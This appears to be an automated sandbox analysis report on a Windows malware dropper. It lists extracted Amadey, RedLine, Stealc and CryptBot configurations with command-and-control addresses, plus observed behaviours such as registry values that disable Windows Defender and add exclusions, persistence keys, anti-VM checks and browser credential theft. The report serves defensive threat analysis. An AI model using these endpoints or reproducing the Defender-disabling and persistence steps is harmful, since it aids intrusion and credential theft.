Analysis
-
max time kernel
298s -
max time network
299s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
16-09-2024 05:01
Static task
static1
Behavioral task
behavioral1
Sample
3fe959722443c1171b390de870518f3be721b0ccadd49f2fe1d89fd1ee07458e.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
3fe959722443c1171b390de870518f3be721b0ccadd49f2fe1d89fd1ee07458e.exe
Resource
win10-20240404-en
General
-
Target
3fe959722443c1171b390de870518f3be721b0ccadd49f2fe1d89fd1ee07458e.exe
-
Size
1.8MB
-
MD5
9731fffd7b478b386655c8b87eed24ac
-
SHA1
92ad41f7bd9879774dc4e52e1781ccd8b328320e
-
SHA256
3fe959722443c1171b390de870518f3be721b0ccadd49f2fe1d89fd1ee07458e
-
SHA512
1e7558535668bf98d6bb5dd34dc37778387d56572005a4179e78719f108ea468f88ec10143281b6b2d4291f7c370bedded6cd3ae4b3303c0b88d9739314f3bbb
-
SSDEEP
49152:7LMeoAgVVqdZIOdOq1bch/o/VoI2mEPUDjjx7yZX:7YrAgVVq5zEHXPUD35yN
Malware Config
Extracted
amadey
4.41
fed3aa
http://185.215.113.16
-
install_dir
44111dbc49
-
install_file
axplong.exe
-
strings_key
8d0ad6945b1a30a186ec2d30be6db0b5
-
url_paths
/Jo89Ku7d/index.php
Extracted
redline
LiveTraffic
95.179.250.45:26212
Extracted
redline
@OLEH_PSP
65.21.18.51:45580
Extracted
stealc
default2
http://185.215.113.17
-
url_path
/2fb6c2cc8dce150a.php
Extracted
stealc
default
http://91.202.233.158
-
url_path
/e96ea2db21fa9a1b.php
Extracted
redline
bundle
185.215.113.67:15206
Extracted
cryptbot
fivevd5vs.top
analforeverlovyu.top
-
url_path
/v1/upload.php
Extracted
redline
TG CLOUD @RLREBORN Admin @FATHEROFCARDERS
91.194.55.146:29862
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 14 IoCs
resource yara_rule behavioral1/memory/2324-47-0x0000000000400000-0x0000000000452000-memory.dmp family_redline behavioral1/memory/2324-50-0x0000000000400000-0x0000000000452000-memory.dmp family_redline behavioral1/memory/2324-53-0x0000000000400000-0x0000000000452000-memory.dmp family_redline behavioral1/memory/2324-52-0x0000000000400000-0x0000000000452000-memory.dmp family_redline behavioral1/memory/2324-45-0x0000000000400000-0x0000000000452000-memory.dmp family_redline behavioral1/files/0x00050000000195a7-94.dat family_redline behavioral1/memory/952-96-0x0000000000C40000-0x0000000000C92000-memory.dmp family_redline behavioral1/files/0x000500000001a441-318.dat family_redline behavioral1/memory/2764-328-0x0000000000010000-0x0000000000062000-memory.dmp family_redline behavioral1/memory/2736-454-0x0000000000400000-0x0000000000452000-memory.dmp family_redline behavioral1/memory/2736-453-0x0000000000400000-0x0000000000452000-memory.dmp family_redline behavioral1/memory/2736-451-0x0000000000400000-0x0000000000452000-memory.dmp family_redline behavioral1/memory/2736-448-0x0000000000400000-0x0000000000452000-memory.dmp family_redline behavioral1/memory/2736-446-0x0000000000400000-0x0000000000452000-memory.dmp family_redline -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 2940 created 1128 2940 Waters.pif 20 PID 2940 created 1128 2940 Waters.pif 20 -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\linOwUtCTeUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\vECSWYHhNEBU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\NUEAEvpmbtRdsZVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\ASUPEepcmoJTSZEuB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\VLvKqTazivYGshTO = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\EKfHLQOzikZzC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\linOwUtCTeUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\VLvKqTazivYGshTO = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\kVyftiaSU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\ASUPEepcmoJTSZEuB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\VLvKqTazivYGshTO = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\EKfHLQOzikZzC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\TcokmJWkeMGVDHpHTSR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\VLvKqTazivYGshTO = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\vECSWYHhNEBU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\kVyftiaSU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\NUEAEvpmbtRdsZVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\TcokmJWkeMGVDHpHTSR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3fe959722443c1171b390de870518f3be721b0ccadd49f2fe1d89fd1ee07458e.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 75 1512 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Run Powershell and hide display window.
pid Process 276 powershell.exe 868 powershell.exe 2572 powershell.exe 756 powershell.exe 2020 powershell.exe 2308 powershell.exe 236 powershell.EXE 1944 powershell.EXE 1660 powershell.exe 2600 powershell.EXE -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3fe959722443c1171b390de870518f3be721b0ccadd49f2fe1d89fd1ee07458e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3fe959722443c1171b390de870518f3be721b0ccadd49f2fe1d89fd1ee07458e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Control Panel\International\Geo\Nation MjytQiW.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuantumFlow.url cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuantumFlow.url cmd.exe -
Executes dropped EXE 28 IoCs
pid Process 2056 axplong.exe 2252 gold.exe 2820 crypteda.exe 2724 6InNj3SOTk.exe 952 bhh9YfYYwa.exe 2188 Nework.exe 2828 Hkbsse.exe 2080 stealc_default2.exe 2052 2.exe 2704 needmoney.exe 1840 svchost015.exe 2812 penis.exe 2764 bundle.exe 2312 acentric.exe 2412 2.exe 576 splwow64.exe 2732 crypted.exe 2940 Waters.pif 1444 385121.exe 1980 Install.exe 2348 Install.exe 2332 service123.exe 2576 service123.exe 1176 MYkdETq.exe 2300 MjytQiW.exe 2364 service123.exe 2684 service123.exe 448 service123.exe -
Identifies Wine through registry keys 2 TTPs 2 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine 3fe959722443c1171b390de870518f3be721b0ccadd49f2fe1d89fd1ee07458e.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine axplong.exe -
Indirect Command Execution 1 TTPs 19 IoCs
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.
pid Process 2060 forfiles.exe 1528 forfiles.exe 1728 forfiles.exe 2696 forfiles.exe 2524 forfiles.exe 1120 forfiles.exe 2976 forfiles.exe 2936 forfiles.exe 1664 forfiles.exe 2428 forfiles.exe 1696 forfiles.exe 684 forfiles.exe 1252 forfiles.exe 2148 forfiles.exe 2988 forfiles.exe 1660 forfiles.exe 2524 forfiles.exe 1468 forfiles.exe 2576 forfiles.exe -
Loads dropped DLL 59 IoCs
pid Process 2336 3fe959722443c1171b390de870518f3be721b0ccadd49f2fe1d89fd1ee07458e.exe 2056 axplong.exe 2056 axplong.exe 2056 axplong.exe 2820 crypteda.exe 2820 crypteda.exe 2056 axplong.exe 2188 Nework.exe 2056 axplong.exe 2056 axplong.exe 2080 stealc_default2.exe 2080 stealc_default2.exe 2056 axplong.exe 2056 axplong.exe 2056 axplong.exe 2056 axplong.exe 2704 needmoney.exe 2056 axplong.exe 2056 axplong.exe 2056 axplong.exe 2056 axplong.exe 2412 2.exe 2056 axplong.exe 2056 axplong.exe 1660 cmd.exe 2056 axplong.exe 1444 385121.exe 1444 385121.exe 1444 385121.exe 1444 385121.exe 1980 Install.exe 1980 Install.exe 1980 Install.exe 1980 Install.exe 2348 Install.exe 2348 Install.exe 2348 Install.exe 2052 2.exe 2052 2.exe 2332 service123.exe 2576 service123.exe 1956 WerFault.exe 1956 WerFault.exe 1956 WerFault.exe 2364 service123.exe 1512 rundll32.exe 1512 rundll32.exe 1512 rundll32.exe 1512 rundll32.exe 2412 WerFault.exe 2412 WerFault.exe 2412 WerFault.exe 2412 WerFault.exe 1876 WerFault.exe 1876 WerFault.exe 1876 WerFault.exe 2412 WerFault.exe 2684 service123.exe 448 service123.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\splwow64.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000287001\\splwow64.exe" axplong.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\acentric = "\"C:\\Users\\Admin\\Pictures\\Opportunistic Telegraph\\acentric.exe\" /update" acentric.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json MjytQiW.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json MjytQiW.exe -
Drops file in System32 directory 26 IoCs
description ioc Process File created C:\Windows\system32\GroupPolicy\gpt.ini MYkdETq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 MjytQiW.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA MjytQiW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_2F09F384AB04F931E2EF39FD04145E2F MjytQiW.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol MYkdETq.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini MYkdETq.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol MYkdETq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA MjytQiW.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 MjytQiW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_2F09F384AB04F931E2EF39FD04145E2F MjytQiW.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol MjytQiW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_5F8ABD199E1CF2EB9B30F8FD50D3DB0D MjytQiW.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat MjytQiW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_2E1554F9937BF8D3743D83D919742174 MjytQiW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_5F8ABD199E1CF2EB9B30F8FD50D3DB0D MjytQiW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_2E1554F9937BF8D3743D83D919742174 MjytQiW.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 1256 tasklist.exe 2704 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2336 3fe959722443c1171b390de870518f3be721b0ccadd49f2fe1d89fd1ee07458e.exe 2056 axplong.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 2252 set thread context of 2324 2252 gold.exe 34 PID 2704 set thread context of 1840 2704 needmoney.exe 48 PID 2732 set thread context of 2736 2732 crypted.exe 65 -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files (x86)\TcokmJWkeMGVDHpHTSR\vMxVtgP.xml MjytQiW.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja MjytQiW.exe File created C:\Program Files (x86)\vECSWYHhNEBU2\MMtAEvz.xml MjytQiW.exe File created C:\Program Files (x86)\linOwUtCTeUn\QAnOdgy.dll MjytQiW.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak MjytQiW.exe File created C:\Program Files (x86)\EKfHLQOzikZzC\agSfxQf.xml MjytQiW.exe File created C:\Program Files (x86)\vECSWYHhNEBU2\tQZwEjvSCJZrw.dll MjytQiW.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi MjytQiW.exe File created C:\Program Files (x86)\kVyftiaSU\SIqgEfJ.xml MjytQiW.exe File created C:\Program Files (x86)\TcokmJWkeMGVDHpHTSR\rgYPZrQ.dll MjytQiW.exe File created C:\Program Files (x86)\EKfHLQOzikZzC\pNrJDyH.dll MjytQiW.exe File created C:\Program Files (x86)\kVyftiaSU\QwjSJr.dll MjytQiW.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi MjytQiW.exe -
Drops file in Windows directory 10 IoCs
description ioc Process File created C:\Windows\Tasks\hjqxuCHRKqyyPIyfi.job schtasks.exe File created C:\Windows\Tasks\axplong.job 3fe959722443c1171b390de870518f3be721b0ccadd49f2fe1d89fd1ee07458e.exe File opened for modification C:\Windows\ViewpictureKingdom splwow64.exe File opened for modification C:\Windows\BrandonBlind splwow64.exe File opened for modification C:\Windows\IpaqArthur splwow64.exe File created C:\Windows\Tasks\bmbXFarNlpbNUcjZUs.job schtasks.exe File created C:\Windows\Tasks\cszbzSIAjSjUwyOsr.job schtasks.exe File created C:\Windows\Tasks\HlGMqKYvccXUYlk.job schtasks.exe File created C:\Windows\Tasks\Hkbsse.job Nework.exe File opened for modification C:\Windows\HardlyAircraft splwow64.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 1956 1176 WerFault.exe 113 2412 2348 WerFault.exe 79 1876 2300 WerFault.exe 274 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bhh9YfYYwa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Hkbsse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3fe959722443c1171b390de870518f3be721b0ccadd49f2fe1d89fd1ee07458e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wscript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language stealc_default2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language crypted.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Waters.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
